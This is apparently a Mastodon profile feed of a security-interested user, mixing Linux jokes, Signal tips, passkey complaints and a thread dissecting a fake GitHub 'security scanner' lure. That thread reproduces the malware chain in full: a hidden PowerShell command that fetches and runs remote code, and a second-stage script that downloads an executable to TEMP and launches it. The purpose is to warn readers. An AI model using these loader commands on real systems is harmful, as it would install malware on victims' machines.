@atoponce@fosstodon.org cover
@atoponce@fosstodon.org avatar

atoponce

@[email protected]

MSCSIA, cryptography, security, locksport, Linux, programming, mathematics, amateur radio, Buddhism, running, anime, and bibliophilia.

This profile is from a federated server and may be incomplete. View on remote instance

@atoponce@fosstodon.org avatar atoponce , to random

The comments. Good god.

https://www.reddit.com/r/linuxmemes/comments/1r5dh47/begun_the_distro_wars_have_ubuntu_vs_debian/

Reddit upvote meme asking "Ubuntu or Debian?" with the response of "Debian" followed by massive upvotes.
ALT
@atoponce@fosstodon.org avatar atoponce , to random

4th Edition in your browser.

https://unixv4.dev/

@atoponce@fosstodon.org avatar atoponce , to random

Private Reddit profiles aren't actually private. With the profile pulled up, search for " " (space) and all their posts and comments will be visible.

@atoponce@fosstodon.org avatar atoponce , to random

McDonald's advertising Debian GNU/Linux

Photo of a McDonald's marquee with a digital sign showing the text "Debian GNU".
ALT
@briankrebs@infosec.exchange avatar briankrebs , to random

Was searching my Signal contacts for something something "N" and found a contact I'd not noticed before: Note to Self. One of these days I will just RTFM.

"Who is Note to Self?

This contact entry is a chat to send messages to yourself.
Use this feature to jot down a note for yourself to review later or to share messages and files with your linked devices.
All messages in Note to Self are end-to-end encrypted Signal messages.
Yes, you can send disappearing messages to yourself. The timer starts immediately."

https://support.signal.org/hc/en-us/articles/360043272451-Note-to-Self

Articles in this section Note to Self Signal Secure Backup Filtered by unread Chat Folders on Signal Android | wo STH How to create and share call links « @ Notetoserr 8 Phone Number Privacy and Usernames oN » Phone Number Privacy and 4 3 Usernames: Deeper Dive 7] | Stories 8. | an @ Text Formatting Change the Signal app icon on your Who is Note to Self? phone « This contact entry is a chat to send messages to yourself. Edit Message « Use this feature to jot down a note for yourself to review later or to share messages and files with your linked devices. See more « All messages in Note to Self are end-to-end encrypted Signal messages. + Yes, you can send disappearing messages to yourself. The timer starts immediately. Here's how to start a Note to Self on: « Android . 0s « Desktop
ALT
atoponce ,
@atoponce@fosstodon.org avatar

@briankrebs It's a great feature. I use it for sending photos, notes, file attachments, passwords, and all sorts of shit. I set it for disappearing messages after 1 week. Works like a charm.

@nixCraft@mastodon.social avatar nixCraft , (edited ) to random

Poll: Do you prefer a wireless or wired mouse? 🤔

atoponce ,
@atoponce@fosstodon.org avatar

@nixCraft Batteries suck.

@nixCraft@mastodon.social avatar nixCraft , to random

[Thread, post or comment was deleted by the author]

    •
    atoponce ,
    @atoponce@fosstodon.org avatar

    @nixCraft

    but_why.gif

    @atoponce@fosstodon.org avatar atoponce , to random

    Developer applies at @ubuntu , goes through extensive hiring filters and many interviews, gets an offer in hand, accepts the offer, quits their job, only for Canonical to retract the offer.

    Don't work for Canonical.

    https://www.reddit.com/r/linux/comments/1ij4itg/canonical_what_a_shame/

    @atoponce@fosstodon.org avatar atoponce , to random

    I just got an email from GitHub about a new issue for my password generator.

    "Hey there!

    We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.

    Best regards,
    Github Security Team"

    Uh huh. A security vulnerability for a password generator. Maybe, but I'm skeptical.

    However, the issue no longer exists. Looks like GitHub took it down as spam.

    I'm curious about that URL though.

    1/n

    atoponce OP ,
    @atoponce@fosstodon.org avatar

    Visiting github-scanner[.]com I need to verify that I'm human. Okay. sure. It then requests I do the following:

    1. Press Windows Button + R.
    2. Press CTRL + V
    3. Press Enter

    In other words, pull up a shell and paste whatever is in my clipboard.

    What's in the clipboard you ask?

    powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"

    "download.txt". Yeah, I'm suuuuure that's a text file.

    2/n

    atoponce OP ,
    @atoponce@fosstodon.org avatar

    So, grabbing https://github-scanner[.]com/download.txt and pulling it up in a text editor reveals the following:

    $webClient = New-Object System.Net.WebClient
    $url1 = "https://github-scanner[.]com/l6E.exe"
    $filePath1 = "$env:TEMP\SysSetup.exe"
    $webClient.DownloadFile($url1, $filePath1)
    Start-Process -FilePath $env:TEMP\SysSetup.exe

    "l6E.exe". Any bets on whether or not that's malware?

    Sure enough, it's a positive match with VirusTotal.

    https://www.virustotal.com/gui/file/d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207

    3/3

    @nixCraft@mastodon.social avatar nixCraft , (edited ) to random

    Have you ever rebooted the wrong server in production?

    atoponce ,
    @atoponce@fosstodon.org avatar

    @nixCraft I had a set of shells open in our dev environment in one virtual desktop and a set of shells open to our prod environment in another virtual desktop.

    Not paying attention, thinking I was rebooting all the servers in dev, I was in the wrong virtual desktop, and rebooted all the servers in prod.

    Worse, prod included MooseFS of which the metadata server is a single point of failure.

    We were down for hours, and my boss was PISSED. It was a long night.

    @nixCraft@mastodon.social avatar nixCraft , to random

    If you don’t understand recursion, reread this post again 🤭

    atoponce ,
    @atoponce@fosstodon.org avatar
    @atoponce@fosstodon.org avatar atoponce , to random

    Generative AI is garbage, exhibit 99:

    Discussion with ChatGPT 4o: User: 9.11 and 9.9 - which is bigger ChatGPT: 9.11 is bigger than 9.9 User: subtract them ChatGPT: To subtract 9.9 from 9.11, you perform the following calculation: 9.11 - 9.99 = 0.21. User: use python ChatGPT: The result of subtracting 9.9 from 9.11 in Python is -0.79. This discrepancy is due to the way floating-point arithmetic is handled in Python, which can lead to small precision errors. The actual intended result should be 0.21.
    ALT
    @atoponce@fosstodon.org avatar atoponce , to random

    > “Dad, why is my sister’s name Rose?”

    “Because that’s your mother’s favorite flower.”

    > “Thanks, Dad!”

    “No problem, Fortran.”

    Screenshot from a post made at r/learnprogramming on Reddit: "fastest way to learn fortran as teen" "Hello, I found out that my name is also the name of a programming language. I thought it would be cool to learn this, also because my parents seem to be real fans of this language. I want to surprise them with my skills. I don't know anything about coding except some scripting in Roblox (Lua language). How can I learn the fastest. Thank you guys, With kind regards, Fortran" Top reply says "What the fuck"
    ALT
    @atoponce@fosstodon.org avatar atoponce , to random

    You guys don't understand.

    If Google pays taxes in a random country, to cheat the system and save money, that's clever because "Globalism".

    If you do it, you get banned though.

    Its like work, employers can out source any job, but if you do it you get fired.

    Or you know, CEOs can work for multiple companies. If you do it it’s time theft.

    https://techcrunch.com/2024/06/20/youtube-confirms-crackdown-on-vpn-users-accessing-cheaper-premium-plans/

    @atoponce@fosstodon.org avatar atoponce , to random

    Passkeys are indeed a shattered dream. Everything in this post is spot on with my experience using them.

    In theory, I love the idea. In practice, it's a horrible, horrible, horrible UX.

    I'll stick with + security keys/TOTP until this mess gets cleaned up.

    https://fy.blackhats.net.au/blog/2024-04-26-passkeys-a-shattered-dream/

    @atoponce@fosstodon.org avatar atoponce , to random

    How it started: How it's going:

    image/jpeg